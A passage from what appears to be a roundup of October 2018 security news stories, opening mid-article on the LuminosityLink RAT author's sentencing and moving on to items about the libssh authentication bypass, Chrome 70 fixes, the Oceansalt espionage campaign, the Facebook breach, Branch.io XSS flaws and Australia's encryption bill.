The man, Colton Grubbs, 21, of Stanford, Kentucky, admitted in court earlier this year to designing, marketing, and selling LuminosityLink, a piece of malware that could record keystrokes, access the camera and microphone for surveillance purposes, download files, and steal login credentials.

As part of his guilty plea, Grubbs also revealed that he was aware of the fact that some of his customers would use the software to remotely access and control computers without their owner's knowledge or consent.

The RAT was being sold via the luminosity[.]link and luminosityvpn[.]com websites, but the malware author suspended sales via luminosity[.]link in July 2017, half a year before law enforcement agencies released the details of an operation specifically targeting LuminosityLink users.

Grubbs, who admitted to selling the malicious program for $39.99 apiece to more than 6,000 customers, also provided assistance on the use of the RAT for unauthorized computer intrusions. The Trojan was used to target victims throughout the United States and around the world.

Under federal law, Grubbs must serve 85% of his prison sentence. He will be released under supervision of the United States Probation Office for a term of three years.

Grubbs has also been ordered to forfeit the proceeds of his crimes, including 114 Bitcoin (valued at over $725,000 at the moment), which was seized by the Federal Bureau of Investigation.

“Our modern society is dependent on computers, mobile devices, and the use of the internet. It is essential that we vigorously prosecute those who erode that confidence and illicitly gain access to computer systems and the electronic information of others. Everyone benefits when this deceitful conduct is discovered, investigated, and prosecuted,” Robert M. Duncan, Jr., United States Attorney for the Eastern District of Kentucky, said.


Chrome 70 Updates Sign-In Options, Patches 23 Flaws
19.10.2018 securityweek
Vulnerebility

Google on Tuesday released Chrome 70 in the stable channel, with patches for nearly two dozen vulnerabilities, as well as with updated sign-in options.

Available for Windows, Mac and Linux as version 70.0.3538.67, the new Chrome iteration arrives with patches for 23 vulnerabilities, 18 of which were discovered by external researchers. These include 6 flaws rated high severity, 8 medium risk, and 4 low severity issues.

The addressed flaws include sandbox escape, remote code execution, heap buffer overflow, URL spoofing, use after free, memory corruption, cross-origin URL disclosure, security UI occlusion in full screen mode, iframe sandbox escape on iOS, and lack of limits on update() in ServiceWorker.

Google paid over $20,000 in bug bounty rewards to the reporting security researchers.

One other important update that Chrome 70 comes with is the final version of the Transport Layer Security (TLS) 1.3 traffic encryption protocol, which was approved earlier this year. In one year and a half, Chrome and all other major web browsers will no longer support TLS 1.0 and 1.1.

The browser now also provides users with increased control over Chrome sign-in options. The previous Chrome release would automatically sign users into the browser when they signed into a Google service, which raised privacy concerns.

In late September, Google revealed that Chrome’s sign-in behavior was meant to make it more obvious for users that they are logged into a specific account.

“You’ll see your Google Account picture right in the Chrome UI, so you can easily see your sign-in status. When you sign out, either directly from Chrome or from any Google website, you’re completely signed out of your Google Account,” Zach Koch, Chrome Product Manager, explained at the time.

One issue with the functionality, however, was that users had no control over it, and Google decided to change that.

Thus, Chrome 70 now provides users with the option to turn off the linking of web-based sign-in with browser-based sign-in. By default, the linking is turned on, but users can opt out, meaning they will no longer be signed into Chrome when signing into a Google service.

Now, Chrome is also making it clearer for users whether the syncing option is turned on, so that people know when their data is being sent to Google’s servers.


Libssh Vulnerability Exposes Servers to Attacks
19.10.2018 securityweek
Vulnerebility

Servers using libssh to implement the Secure Shell (SSH) remote login protocol may be vulnerable to attacks due to the existence of an authentication bypass flaw discovered recently by a researcher.

Peter Winter-Smith, security consultant at NCC Group, found that versions 0.6 and later of libssh are affected by a flaw that can be exploited by an attacker to authenticate on a server without needing any credentials.

When authentication is initiated, the server expects a SSH2_MSG_USERAUTH_REQUEST message. However, Winter-Smith discovered that an attacker can trick the server into believing authentication was successful by sending it a SSH2_MSG_USERAUTH_SUCCESS message, which is normally only intended for communications from the server to the client.

The vulnerability, tracked as CVE-2018-10933, was patched on Tuesday with the release of libssh 0.8.4 and 0.7.6. The issue was reported to libssh developers on June 25.

An Internet scan conducted with the Shodan search engine shows over 6,300 servers using libssh, and a Censys scan reveals more than 3,300 servers. However, many of them may not be vulnerable to attacks leveraging CVE-2018-10933.

"Not all libSSH servers will necessarily be vulnerable to the authentication bypass," explained Winter-Smith. "Since the authentication bypass sets the internal libSSH state machine to authenticated without ever giving any registered authentication callbacks an opportunity to execute, servers developed using libSSH which maintain additional custom session state may fail to function correctly if a user is authenticated without this state being created."

Many users were concerned about the risk posed by the vulnerability, especially since libssh is also used by GitHub. However, GitHub clarified that while it applied the patches "out of an abundance of caution," the vulnerability did not affect its services due to how the library is used.

Experts also clarified that the vulnerability does not impact OpenSSH, libssh2, curl, or libcurl. Linux distributions are affected, but their developers should release patches in the upcoming period.

NCC Group has published a technical advisory for the vulnerability, which also includes proof-of-concept (PoC) code.

"It is important to note that the authentication bypass exploit detailed above is the most obvious route to exploitation for the overarching issue – the libSSH server state machine is vulnerable to being updated by messages intended only for handling on the client side," Winter-Smith clarified. "Even servers which are not vulnerable to the authentication bypass will may still be vulnerable to other unexpected state manipulation issues, so it is imperative that all services built on top of libSSH are updated even if not demonstrated vulnerable to the authentication bypass."


Britain Leads Calls for EU Action Against Hackers
19.10.2018 securityweek
BigBrothers

British Prime Minister Theresa May will call on fellow EU leaders Thursday to take united action to punish cyber attackers, warning hackers cause economic harm and undermine democracies.

Britain is among eight European Union countries pushing for the bloc to urgently agree a new sanctions regime to address malign cyber activities.

"We should accelerate work on EU restrictive measures to respond to and deter cyber attacks, including a robust sanctions regime," May will say, according to pre-released comments.

She will add: "Malign cyber activity causes harm to our economies, and undermines our democracies.

"As well as protecting ourselves against attack, we must impose proportionate consequences on those who would do us harm."

The move comes amid growing concern at Russia's activities, with Western powers blaming Moscow for numerous acts of hacking and electronic interference.

This month the Netherlands revealed dramatic details of a bid by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

This was "a stark example of the very real threats that we face", May will say, but also "a clear example of where these attacks can be prevented".

A confidential EU proposal seen by AFP and backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands warns that "the pace of events has accelerated considerably".

The paper says it is "only a matter of time before we are hit by a critical operation with severe consequences on the EU".

Lithuania and the other Baltic states, Latvia and Estonia, say they come under near-daily cyber attacks, most originating in Russia, targeting everything from banks and government institutions to transport infrastructure.

Britain's National Cyber Security Centre (NCSC) revealed this week that it has dealt with more than 1,100 cyber incidents in the two years since it was set up, the majority carried out from within "hostile nation states".

May has repeatedly stressed that despite Britain leaving the EU in March, London wants the fullest possible security relationship with the bloc post-Brexit.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But the proposal may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.


Ex-Equifax Manager Gets Home Confinement for Insider Trading
19.10.2018 securityweek
Crime

A former Equifax manager was sentenced Tuesday to serve eight months home confinement for engaging in insider trading in the wake of the company’s massive data breach last year.

Sudhakar Reddy Bonthu, who worked as a software product development manager for the Atlanta-based credit-reporting agency, had pleaded guilty in July. U.S. District Judge Amy Totenberg also ordered Bonthu to pay a $50,000 fine, to serve 50 hours of community service and to forfeit the proceeds he gained from insider trading.

Born in Andhra Pradesh, India, Bonthu, 44, has lived in the United States since 2000. But he is not a U.S. citizen and faces possible deportation as a result of his felony conviction.

Hackers who haven’t been identified accessed Equifax databases without authorization from mid-May through July in 2017 and obtained customers’ personal information. Federal authorities say Equifax discovered the suspicious activity on its network on July 29, 2017.

The company ultimately revealed that the information of nearly 150 million Americans was exposed.

Bonthu and other Equifax employees were asked on Aug. 25, 2017, to help respond to the breach, but were told the work involved a potential Equifax customer, not Equifax itself, prosecutors have said.

Bonthu knew the target date for announcing the breach was Sept. 6. Bonthu used his wife’s brokerage account on Sept. 1 to buy 86 put options in Equifax stock that expired Sept. 15 for about $1,300, prosecutors said. Put options allow the holder to make a profit if the stock price drops.

After the share value plunged when the breach was publicly disclosed on Sept. 7, 2017, Bonthu exercised his put options and made a profit of about $75,000.

Bonthu also faced civil charges from the Securities and Exchange Commission and settled that case in July.

Another former Equifax employee also faces insider trading charges related to the breach. Jun Ying, former chief information officer of Equifax’s U.S. Information Solutions, was indicted in March. He has pleaded guilty and his case is pending. He also faces civil charges of insider trading from the SEC.

Equifax Chief Financial Officer John Gamble and three other executives sold shares worth a combined $1.8 million days after Equifax discovered suspicious activity on its network, but Equifax said an independent committee determined that these executives did not know of the breach when their trades were made.

Bonthu’s wife, addressing the judge during the sentencing hearing, questioned why her husband was being punished when top executives were not.

“He’s just a small fish in this whole game,” Rekha Vummadi said.

Bonthu also addressed the judge, saying he accepted responsibility for his actions and that he was sorry to Equifax stakeholders and to his family.

Totenberg said she had reviewed Bonthu’s history and read letters submitted by his family and former colleagues. Bonthu is clearly very intelligent and has contributed to his community and worked hard to build a good life for his family in this country, she said.

“I don’t know what got into you on this one occasion,” she said and speculated that Bonthu had suffered from the “infection of capitalism.”

Totenberg noted that perhaps the most serious consequence Bonthu faces — possible deportation — is something over which she has no control. With an eye toward potential immigration proceedings, she said for the record that she doesn’t see any evidence of moral turpitude, which can be grounds for deportation.


Tumblr Vulnerability Exposed User Account Information
19.10.2018 securityweek
Vulnerebility

Tumblr on Wednesday disclosed a vulnerability that could have been exploited to obtain user account information, including email addresses and protected passwords.

According to the company, the flaw was related to the “Recommended Blogs” feature in the desktop version of Tumblr. The module shows logged-in users a list of blogs they may be interested in.

The security bug could have allowed an attacker to view account information associated with the blogs listed in the Recommended Blogs section by “using debugging software in a certain way.” Tumblr has not shared any other information on the vulnerability and how it could have been exploited.

The flaw exposed information such as name of the blog, email address, hashed and salted password of the Tumblr account, location, previously used email address, and last login IP.

“We’re not able to determine which specific accounts could have been affected by this bug, but our analysis has shown that the bug was rarely present,” Tumblr said.

The company claims a patch was implemented within 12 hours and there is no evidence that the vulnerability has been used for malicious purposes.

The vulnerability was reported by a researcher participating in the Oath bug bounty program, which also covers Tumblr. Oath, a Verizon subsidiary, is the umbrella company for Yahoo, AOL and other digital content services. Its bug bounty program has paid out over $1 million, with the highest offered rewards ranging between $10,000 and $15,000. It’s unclear how much the researcher earned for reporting the flaw disclosed by Tumblr this week.

“It’s our mission to provide a safe space for people to express themselves freely and form communities around things they love. We feel that this bug could have affected that experience. We want to be transparent with you about it. In our view, it’s simply the right thing to do,” the microblogging platform said.

This statement appears to be inspired by the backlash faced by Google recently for deciding not to immediately disclose a potentially critical API bug that exposed personal information from as many as 500,000 Google+ accounts. Google discovered the problem in March, but only notified users in October.

Back in 2016, Tumblr disclosed a breach affecting 65 million users who had registered accounts before early 2013.


Ex-Virginia Teacher Charged in 2014 'Celebgate' Hacking
19.10.2018 securityweek
Crime

A former Virginia high school teacher is the fifth person charged in an investigation into the 2014 "celebgate" scandal in which hackers obtained nude photographs and other private information from more than 200 people, including celebrities.

Documents filed in federal court show that Christopher Brannan, 30, a former teacher at Lee-Davis High School, has agreed to plead guilty to charges of aggravated identity theft and unauthorized access to a protected computer.

The case was originally filed in Los Angeles, but was transferred to Virginia, where Brannan lives.

Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles, confirmed Wednesday that Brannan is charged in the "celebgate" investigation.

Mrozek would not release the names of the celebrities. But at the time, actress Jennifer Lawrence acknowledged that she was a victim of the hack.

Mrozek said prosecutors have linked Brannan to the hacking, but not to the leak of nude photographs in 2014.

Lawrence contacted authorities after naked photos of her began appearing online. Actress Mary Elizabeth Winstead also confirmed that nude photos of her were posted online.

Under a plea agreement, Brannan's lawyer and prosecutors will recommend a prison sentence of nearly three years. A hearing is scheduled Monday in Richmond.

A statement of facts filed with Brannan's plea agreement says that between August 2013 and October 2014, in Los Angeles County, Virginia and elsewhere, Brannan hacked into internet and email accounts, including Apple iCloud, Yahoo! and Facebook. He was then able to obtain iCloud backups, photographs and other private information belonging to the victims.

The statement said Brannan would gain access to accounts by researching the social media accounts of victims to learn answers to their security questions to access their email accounts.

Brannan also admitted using fraudulent email addresses designed to look like Apple Inc. security accounts. The emails would ask the victims to provide their usernames and passwords to their internet accounts.

Because the emails appeared to be from Apple, the victims would provide the information. Brannan would then use it to access the victims' email accounts, where he obtained personal information, such as "sensitive and private photographs and videos."

Court documents do not include the names of the victims. A spokesman for prosecutors said the victims' names will not be released.

Brannan could not immediately be reached for comment. His lawyer, Abraham Del Rio III, did not respond to requests for comment.

Joshua Stueve, a spokesman for U.S. Attorney G. Zachary Terwilliger, said prosecutors will not release the names of the victims to protect their privacy.

Chris Whitley, a spokesman for Hanover County Public Schools, said Brannan worked at Lee-Davis High School in Mechanicsville, just outside Richmond, from August 2013 to June 2015.

Whitley told the Richmond Times-Dispatch that Brannan was immediately put on administrative leave in January 2015 after school officials were notified by the FBI of an investigation. He said school officials were not given details about the nature of the investigation.

Court documents say Brannan has also admitted hacking or trying to hack accounts of current and former teachers and students at the high school.


Facebook Launches 'War Room' to Combat Manipulation
19.10.2018 securityweek
Social

In Facebook's "War Room," a nondescript space adorned with American and Brazilian flags, a team of 20 people monitors computer screens for signs of suspicious activity.

The freshly launched unit at Facebook's Menlo Park headquarters in California is the nerve center for the fight against misinformation and manipulation of the largest social network by foreign actors trying to influence elections in the United States and elsewhere.

Inside, the walls have clocks showing the time in various regions of the US and Brazil, maps and TV screens showing CNN, Fox News and Twitter, and other monitors showing graphs of Facebook activity in real time.

Facebook, which has been blamed for doing too little to prevent misinformation efforts by Russia and others in the 2016 US election, now wants the world to know it is taking aggressive steps with initiatives like the war room.

"Our job is to detect ... anyone trying to manipulate the public debate," said Nathaniel Gleicher, a former White House cybersecurity policy director for the National Security Council who is now heading Facebook's cybersecurity policy.

"We work to find and remove these actors."

Facebook has been racing to get measures in place and began operating this nerve center -- with a hastily taped "WAR ROOM" sign on the glass door -- for the first round of the presidential vote in Brazil on October 7.

It didn't take long to find false information and rumors being spread which could have had an impact on voters in Brazil.

"On election day, we saw a spike in voter suppression (messages) saying the election was delayed due to protests. That was not a true story," said Samidh Chakrabarti, Facebook's head of civic engagement.

Chakrabarti said Facebook was able to remove these posts in a couple of hours before they went viral.

"It could have taken days."

Humans and machines

At the unveiling of the war room for a small group of journalists including AFP this week, a man in a gray pork pie hat kept his eyes glued to his screen where a Brazilian flag was attached.

He said nothing but his mission was obvious -- watching for any hints of interference with the second round of voting in Brazil on October 28.

The war room, which will ramp up activity for the November 6 midterm US elections, is the most concrete sign of Facebook's efforts to weed out misinformation.

With experts in computer science, cybersecurity and legal specialists, the center is operating during peak times for the US and Brazil at present, with plans to eventually work 24/7.

The war room adds a human dimension to the artificial intelligence tools Facebook has already deployed to detect inauthentic or manipulative activity.

"Humans can adapt quickly to new threats," Gleicher said of the latest effort.

Chakrabarti said the new center is an important part of coordinating activity -- even for a company that has been built on remote communications among people in various parts of the world.

"There's no substitute to face to face interactions," he said.

The war room was activated just weeks ahead of the US vote, amid persistent fears of manipulation by Russia and other state entities, or efforts to polarize or inflame tensions. The war room is part of stepped up security announced by Facebook that will be adding some 20,000 employees.

"With elections we need people to detect and remove (false information) as quickly as possible," Chakrabarti said.

The human and computerized efforts to weed out bad information complement each other, according to Chakrabarti.

"If an anomaly is detected in an automated way, then a data scientist will investigate, will see if there is really a problem," he said.

The efforts are also coordinated with Facebook's fact-checking partners around the world including media organizations such as AFP and university experts.

Gleicher said the team will remain on high alert for any effort that could lead to false information going viral and potentially impacting the result of an election.

"We need to stay ahead of bad actors," he said. "We keep shrinking the doorway. They keep trying to get in."


'Operation Oceansalt' Reuses Code from Chinese Group APT1
19.10.2018 securityweek
APT

A recently observed cyber-espionage campaign targeting South Korea, the United States and Canada is reusing malicious code previously associated with state-sponsored Chinese group APT1, McAfee reports.

Exposed in a Mandiant report in 2013 and also known as Comment Crew, APT1 was thought to be a unit of China’s People’s Liberation Army (PLA) and was considered both one of the most persistent of China's cyber threat actors and highly prolific in terms of the quantity of information it had stolen.

The newly observed campaign is unlikely the work of APT1, which has remained silent ever since the Mandiant report half a decade ago. Previously, the group had launched cyber-attacks on more than 141 U.S. companies from 2006 to 2010.

Dubbed Oceansalt, the malware implant used in the new campaign shows code similarities with a tool employed by APT1, namely Seasalt. This means that the actor behind the new operation had direct access to Comment Crew’s source code, although it was never made public.

McAfee’s report (PDF) on Oceansalt doesn’t provide a clear answer on who is behind these attacks, but notes that the code overlap could suggest that another group had access to the original code, or that it is a case of code-sharing between actors. Of course, it could also be a “false flag” operation.

McAfee’s security researchers discovered that Oceansalt was launched in five attack waves adapted to the targets.

While the first two attacks were spearfishing-based and used malicious Korean-language Microsoft Excel documents to download the implant, the third switched to Microsoft Word documents instead. Waves four and five targeted a small number of entities outside of South Korea, including the U.S. and Canada.

During the attacks, the hackers used multiple command and control (C&C) servers, showing that the campaign is active in countries such as Canada, Costa Rica, the United States, and the Philippines.

Oceansalt and Seasalt, McAfee notes, not only contain two exact same strings (Upfileer and Upfileok), but also show similarities in command handler and index table, and execute their capabilities in the same way. Furthermore, both use the exact same response codes to indicate the success or failure of command execution.

Both implants use the same codes for drive and file reconnaissance, and for the creation of reverse-shells (which are based on cmd.exe). Unlike Seasalt, however, Oceansalt uses an encoding and decoding mechanism, and a hardcoded control server address, but employs no persistence method.

According to McAfee, evidence that suggests code-sharing between Oceansalt authors and Comment Crew include the different mechanism for getting the C&C IP addresses, as well as the lack of reverse-shell capability in some Oceansalt samples, the presence of debug strings in Oceansalt, and the presence of new functions in one Oceansalt variant.

The implant, the researchers reveal, packs a broad range of capabilities to capture data from the victims’ machines, but it is only a first-stage component, with additional stages downloaded through commands. The malware, however, provides operators with the ability to perform various actions on the system.

Oceansalt includes support for a dozen commands: extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.

“Our research shows that Comment Crew’s malware in part lives on in different forms employed by another advanced persistent threat group operating primarily against South Korea. This research represents how threat actors including nation-states might collaborate on their campaigns,” McAfee concludes.


Google Pixel 3 Improves Data Protection with Security Chip
19.10.2018 securityweek
Safety

Google has packed the recently launched Pixel 3 and Pixel 3 XL devices with Titan M, a hardened security microcontroller that can better protect information at hardware level.

Designed and manufactured by Google, Titan M is a second-generation, low-power security module meant to help with the Android Verified Boot, storing secrets, providing backing for the Android Strongbox Keymaster module, and enforcing factory-reset policies.

Courtesy of Insider Attack Resistance, the chip also ensures that no one, not even Google, can unlock a phone or install firmware updates without the owner's cooperation, the Internet search company reveals.

The purpose of including Titan M in Pixel 3 devices was to reduce attack surface. It is a separate chip, which mitigates against entire classes of hardware-level exploits such as Rowhammer, Spectre, and Meltdown, Google claims.

Titan M's processor, caches, memory, and persistent storage are isolated from the rest of the phone’s system, meaning that such side channel attacks are nearly impossible. Furthermore, the chip includes additional defenses that, alongside its physical isolation, protect against external attacks.

“But Titan M is not just a hardened security microcontroller, but rather a full-lifecycle approach to security with Pixel devices in mind. Titan M's security takes into consideration all the features visible to Android down to the lowest level physical and electrical circuit design and extends beyond each physical device to our supply chain and manufacturing processes,” Google says.

The chip, however, also includes features optimized for the mobile experience, such as low power usage, low-latency, hardware crypto acceleration, tamper detection, and secure, timely firmware updates.

Google says it also created a custom provisioning process for transparency and control at every step of the design process, starting from the earliest silicon stages.

“We know what's inside, how it got there, how it works, and who can make changes,” the company says.

Google also plans on making the Titan M firmware source code publicly available soon. The Internet giant holds the root keys necessary to sign Titan M firmware, but vendors will be able to reproduce binary builds based on the public source.

Titan M features an ARM Cortex-M3 microprocessor hardened against side-channel attacks, as well as hardware accelerators, including AES, SHA, and a programmable big number coprocessor for public key algorithms.

The implementation of Titan M, the company says, is also focused on ensuring that new features, capabilities, and performance that are not readily available in off-the-shelf components can be delivered to users.

“These changes allow higher assurance use cases like two-factor authentication, medical device control, P2P payments, and others that we will help develop down the road,” Google explains.


Apple's Revamped Privacy Website Offers Users Access to Their Data
19.10.2018 securityweek
Apple

Apple users can now get a copy of the data the tech giant has on them, directly from a refreshed and expanded privacy website rolled out this week.

The revamped mini site provides users with easier and faster access to the personal information that Apple keeps, and appears meant to complement a series of new security and privacy features that were included in iOS 12 and macOS Mojave.

As expected, the Cupertino-based iPhone maker voices its commitment to user safety and privacy on the mini site, where it also lists the features that it has included in its products in this regard.

“We’re committed to keeping your personal information safe. That’s why we innovate ways to safeguard your privacy on your device, why we’re up front about how we personalize your experience, and why we equip developers with the best tools to protect your data,” Apple says.

On top of that, the company also provides users with information on how to manage their privacy and what tools they can take advantage of for that. Thus, the privacy-focused website offers details on how users can keep devices, data, and their Apple ID secure, as well as on how they can protect themselves from phishing.

Apple users can also access a Data and Privacy page where a series of dedicated privacy management tools are available. These allow users not only to grab a copy of their data, but also to request a correction to that data, and even deactivate their Apple ID temporarily, or delete their accounts and the data associated with them, permanently.

At the moment, the self-service data and privacy tools are available to users in the United States, the European Union, Australia, Canada, Iceland, Liechtenstein, New Zealand, Norway, and Switzerland.

However, Apple says customers around the world will get access to the same capabilities in the coming months. In the meantime, users in other countries or regions can request a correction to their data or delete their account and associated data, and can also contact Apple to request a copy of their data.

The tech company also reveals that, after conducting a review of its data collection practices, it has decided to include new and updated data and privacy statements in Apple products, “to make it easier than ever to understand how Apple will use your personal information.”

These statements are showed before the user signs in with their Apple ID or turns on any new features that use their data, the company says.

The privacy website also allows users to access a transparency report page, which includes information on the “various forms of legal process requesting information from or actions by Apple.” These range from government requests for locating lost or stolen devices to requests for user data, emergency requests, and requests from private parties in the U.S. seeking customer data.


Open Source Security Management Firm WhiteSource Raises $35 Million
18.10.2018 securityweek
IT

WhiteSource, a company that specializes in open source security management, on Wednesday announced that it raised $35 million in a Series C funding round.

The round was led by Susquehanna Growth Equity, with participation from existing investors 83North and M12 - Microsoft Ventures. The latest funding brings the total raised by the company to date to $46 million.

The company says the money will be used to further increase its reach by opening new sales, marketing and customer support operations in San Francisco and London, along with other locations that will help its global expansion. The firm currently has offices in New York, Boston, and Tel Aviv, Israel.

Founded in 2011, WhiteSource helps organizations use open source software without slowing development or making compromises on security. The company says its Effective Usage Analysis product reduces open source vulnerabilities by 70%.

WhiteSource says its solutions are used by more than 500 organizations of all sizes and from all industries, including nearly a quarter of Fortune 100 companies. Customers include Microsoft, IBM, Comcast and KPMG.

“We are now at a stage where the question is not whether or not to use open source components, but how to put in place the solutions and policies to manage them well,” said Rami Sass, co-founder and CEO of WhiteSource. “Microsoft’s acquisition of GitHub for $7.5B showcases that companies have accepted open source as crucial to the software development process, but incidents such as the Equifax data breach underscore the necessity for all companies to protect their products from attacks that would exploit the open source components they are using.”


How to Check What Facebook Hackers Accessed in Your Account
18.10.2018 securityweek
Social

Could hackers have been able to see the last person you cyberstalked, or that party photo you were tagged in? According to Facebook, the unfortunate answer is "yes."

On Friday, the social network said fewer users were affected in a security breach it disclosed two weeks ago than originally estimated — nearly 30 million, down from 50 million. In additional good news, the company said hackers weren't able to access more sensitive information like your password or financial information. And third-party apps weren't affected.

Still, for users already uneasy about the privacy and security of their Facebook accounts after a year of tumult , the details that hackers did gain access to — gender, relationship status, hometown and other info — might be even more unsettling.

Facebook has been quick to let users check exactly what was accessed. But beyond learning what information the attackers accessed, there's relatively little that users can do — beyond, that is, watching out for suspicious emails or texts. Facebook says the problem has been fixed.

The company set up a website that its 2 billion global users can use to check if their accounts have been accessed, and if so, exactly what information was stolen. It will also provide guidance on how to spot and deal with suspicious emails or texts. Facebook will also send messages directly to those people affected by the hack.

On that page, following some preliminary information about the investigation, the question "Is my Facebook account impacted by this security issue?" appears midway down. It will also provide information specific to your account if you're logged into Facebook.

Facebook said the hackers accessed names, email addresses or phone numbers from these accounts. For 14 million of them, hackers got even more data — basically anything viewable on your account that any of your friends could see, and more. It's a pretty extensive list: user name, gender, locale or language, relationship status, religion, hometown, self-reported current city, birthdate, device types used to access Facebook, education, work, the last 10 places you checked into or were tagged in, your website, people or Pages you follow and your 15 most recent searches.

An additional 1 million accounts were affected, but hackers didn't get any information from them.

The company isn't giving a breakdown of where these users are, but says the breach was "fairly broad." It plans to send messages to people whose accounts were hacked.

Facebook said the FBI is investigating, but asked the company not to discuss who may be behind the attack. The company said it hasn't ruled out the possibility of smaller-scale attacks that used the same vulnerability.

The company said it has fixed the bugs and logged out affected users to reset those digital keys.

Facebook Vice President Guy Rosen said in a Friday call with reporters that the company hasn't ruled out the possibility that other parties might have launched other, smaller scale efforts to exploit the same vulnerability before it was disabled.

Patrick Moorhead, founder of Moor Insights & Strategy, said the breach appeared similar to identity theft breaches that have occurred at companies including Yahoo and Target in 2013.

"Those personal details could be very easily be used for identity theft to sign up for credit cards, get a loan, get your banking password, etc.," he said. "Facebook should provide all those customers free credit monitoring to make sure the damage is minimized."

Thomas Rid, a professor at the Johns Hopkins University, also said the evidence, particularly the size of the breach, seems to point to a criminal motive rather than a sophisticated state operation, which usually targets fewer people.

"This doesn't sound very targeted at all," he said. "Usually when you're looking at a sophisticated government operation, then a couple of thousand people hacked is a lot, but they usually know who they're going after."


Branch.io Flaws Exposed Tinder, Shopify, Yelp Users to XSS Attacks
18.10.2018 securityweek
Vulnerebility

Hundreds of millions of users may have been exposed to cross-site scripting (XSS) attacks due to a vulnerability present in Branch.io, a service used by Tinder, Shopify, Yelp and many others.

Researchers at vpnMentor were analyzing Tinder and other dating applications when they discovered a Tinder domain, go.tinder.com, that had multiple XSS vulnerabilities.

According to vpnMentor, the flaws could have been exploited to access Tinder users’ profiles. However, it’s worth pointing out that exploiting XSS flaws in most cases requires the target to click on a specially crafted link.

After being notified of the vulnerabilities, Tinder’s security team launched an investigation and determined that the go.tinder.com domain was actually an alias for custom.bnc.lt, a resource of Branch.io.

Branch.io is a California-based company whose solutions help organizations create deep links for referral systems, invitations and sharing links for attribution and analytics purposes.

The affected Branch.io resource is used by several other major companies, including Yelp, Western Union, Shopify, RobinHood, Letgo, imgur, Lookout, fair.com and Cuvva, vpnMentor said.

The VPN company’s researchers estimate that the vulnerabilities may have affected as many as 685 million individuals using the impacted services.

While the security holes have been patched and there is no evidence of malicious exploitation, vpnMentor still believes users should change their passwords as a precaution.

As for the flaw, experts said it was a DOM-based XSS that would have been easy to exploit in many web browsers due to Branch.io’s failure to use a Content Security Policy (CSP).

“[DOM-based XSS] is a type of attack wherein the attack payload is executed as a result of modifying the DOM environment in the victim’s browser, more so in a dynamic environment,” vpnMentor said in a blog post. “In DOM-based XSS, the HTML source code and response of the attack will be exactly the same. This means the malicious payload cannot be found in the response, making it extremely difficult for browser-built in XSS mitigation features like Chrome’s XSS Auditor to perform.”


Tech Giants Concerned About Australia's Encryption Laws
18.10.2018 securityweek
Security

Cyber law changes proposed in Australia specifically state that companies will not be required to implement encryption backdoors, but tech giants are still concerned that the current form of the legislation is too vague and leaves a lot of room for interpretation.

Australia's Telecommunications and Other Legislation Amendment (Assistance and Access) Bill of 2018 aims to compel local and international technology service providers to cooperate with law enforcement and intelligence agencies on investigations into criminal and terrorist activity or face fines of millions of dollars.

The bill wants to give agencies the ability to make three types of requests: a Technical Assistance Request (TAR), which provides a framework for making requests and which includes provisions for compensating firms that provide voluntary assistance; a Technical Assistance Notice (TAN), which compels companies to provide assistance, if they can; and a Technical Capability Notice (TCN), which compels companies to develop new capabilities in anticipation of a future TAN or TAR.

The bill specifically mentions that the goal of the government is not to weaken encryption, but tech giants are still concerned.

The Assistance and Access Bill was introduced to the Parliament's Intelligence and Security Committee on September 20 and comments were accepted until Friday, October 12.

More than 60 submissions were received from both individuals and organizations. Unsurprisingly, law enforcement organizations, such as the Police Federation of Australia, welcome the initiative, and government agencies are trying to convince everyone that encryption will not be weakened.

Australia's Department of Home Affairs claims the new bill "establishes a technologically neutral framework for industry and government to work together towards access solutions with entrenched security protections."

"The new arrangements put in place by the Bill will allow, where possible, Australian authorities exceptional access to encrypted communications in circumstances negotiated by industry and Government. Importantly, any arrangement that would introduce weaknesses and make innocent, third-party communications vulnerable would be in contravention of the Bill’s legal safeguards," the department commented.

Cisco, Apple, Mozilla, Kaspersky Lab and others are still concerned about the bill and its international impact, particularly due to its vagueness and lack of transparency.

Kaspersky Lab has commented on various aspects of the bill, including legal implications.

"By enabling direct access to the foreign users’ machines through the technology provider, rather than through the approved cooperation channels, the Bill may instituonalize circumvention of the standardized procedures of formal mutual legal assistance requests on the grounds of urgency or secrecy," the cybersecurity firm said. "More so, the regulators in jurisdictions where a mutual legal assistance regime with Australia is absent may consider this access to be a violation of nation’s sovereignty. When served with a notice to access data in those jurisdictions and conceal this action, providers may face a stark choice of which country’s laws they will have to violate."

Cisco is concerned that other governments will follow Australia's example, but they "may not have Australia's commitment to restraint in the exercise of executive power."

"Without further amendment, we believe the net result of these changes would harm the security interests of Australia by setting a precedent that could be adopted by less liberal regimes," Cisco said.

Mozilla warned that "any measure that allows a government to dictate the design of Internet systems represents a significant risk to the security, stability and trust of those systems."

"The bill is intentionally vague on the form and extent of what might be compelled by a TCN, so it is difficult to say what kinds of capabilities might be requested. We wish to emphasize that an under-specified authority to impose technical capabilities onto a software vendor not only introduces substantive problems through insufficient clarity, but also fails to provide certainty for both users and developers of technology," Mozilla said.

Apple says it's willing to help law enforcement investigations, but believes weakening encryption is not necessary. The tech giant wants the law to be clear and unambiguous and include a "firm mandate" that bans the weakening of encryption and other security protections.

"We encourage the government to stand by their stated intention not to weaken encryption or compel providers to build systemic weaknesses into their products. Due to the breadth and vagueness of the bill’s authorities, coupled with ill-defined restrictions, that commitment is not currently being met," Apple noted. "For instance, the bill could allow the government to order the makers of smart home speakers to install persistent eavesdropping capabilities into a person’s home, require a provider to monitor the health data of its customers for indications of drug use, or require the development of a tool that can unlock a particular user’s device regardless of whether such tool could be used to unlock every other user’s device as well. All of these capabilities should be as alarming to every Australian as they are to us."


Web Isolation Firm Garrison Technologies Raises $30 Million
18.10.2018 securityweek
IT

London, UK-based Garrison Technologies has raised £22.9 million (approximately $30 million) in Series B funding, bringing the total raised £34.9 million (around $50 million at current exchange rates). The funding was led by Dawn Capital, with participation from existing investors IP Group plc, BGF and NM Capital.

